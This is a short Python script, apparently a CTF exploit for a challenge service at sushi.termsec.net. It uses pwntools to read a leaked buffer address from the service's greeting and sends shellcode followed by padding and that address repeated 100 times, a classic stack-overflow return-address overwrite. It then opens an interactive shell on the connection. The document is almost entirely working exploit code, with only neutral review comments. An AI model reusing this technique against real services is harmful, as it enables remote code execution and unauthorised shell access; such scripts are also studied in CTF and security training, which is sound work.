
@m--- /sushi.py Secret
Last active Aug 29, 2015

# coding: utf-8
import os
import sys
import time
import re
import struct
import pwn
# NOTE(review): this script mixes byte strings read from disk with plain
# string literals and matches a str regex against socket data, so it appears
# to be written for Python 2 -- confirm before running under Python 3.

# Remote endpoint the script connects to.
host = 'sushi.termsec.net'
port = 4000

# Raw contents of a pre-built binary blob expected next to this script.
shellcode = open('x64-linux-sh', 'rb').read()


def p(x):
    """Pack *x* as an unsigned 64-bit little-endian value."""
    return struct.pack('<Q', x)


s = pwn.remote(host, port)

# The script depends on the service printing a hex pointer in its greeting,
# right after a fixed prompt string. Presumably this is the address of the
# service's input buffer (the log label calls it "str1") -- not confirmable
# from this file. A service that did not disclose the pointer would leave
# the regex without a match and the script would stop here.
banner = s.recv()
leak = re.search('Deposit money for sushi here: (0x[0-9a-f]+)', banner)
ptr_str1 = int(leak.group(1), 16)
pwn.log.info('str1: 0x%x' % ptr_str1)

# Message layout: the blob, then len(blob) % 8 bytes of 0x90, then the
# disclosed pointer packed as 8 bytes and repeated 100 times.
filler = '\x90' * (len(shellcode) % 8)
pointer_run = p(ptr_str1) * 100
payload = shellcode + filler + pointer_run

# One newline-terminated line is sent, then the terminal is attached to the
# connection.
s.send(payload + '\n')
s.interactive()